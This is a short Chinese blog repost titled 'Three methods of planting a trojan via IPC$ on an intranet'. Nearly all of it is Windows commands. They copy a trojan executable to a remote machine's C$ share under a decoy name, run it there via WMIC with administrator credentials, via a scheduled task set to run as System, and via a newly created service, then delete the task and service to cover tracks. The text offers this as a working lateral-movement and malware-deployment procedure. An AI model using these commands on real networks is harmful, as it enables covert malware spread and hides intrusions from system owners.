码迷,mamicode.com
首页 > 其他好文 > 详细

内网IPC$种马的三种方法

时间:2015-06-17 21:10:23      阅读:200      评论:0      收藏:0      [点我收藏+]

标签:

copy muma.exe \\host\c$\windows\temp\foobar.exe     ##IPC拷贝木马文件
 

WMIC远程运行命令

wmic /node:host /user:administrator /p 密码 process call create “c:\windows\temp\foobar.exe” 
 

schtasks计划任务远程运行

schtasks /create /tn foobar /tr c:\windows\temp\foobar.exe /sc once /st 00:00            /S host /RU System 

schtasks /run /tn foobar /S host 

schtasks /F /delete /tn foobar /S host ##清除schtasks
 

SC添加服务远程运行命令

sc \\host create foobar binpath=“c:\windows\temp\foobar.exe”    ##新建服务,指向拷贝的木马路径 

sc \\host start foobar        ##启动建立的服务 
sc \\host delete foobar    ##完事后删除服务

  

内网IPC$种马的三种方法

标签:

原文地址:http://www.cnblogs.com/dongchi/p/4584225.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!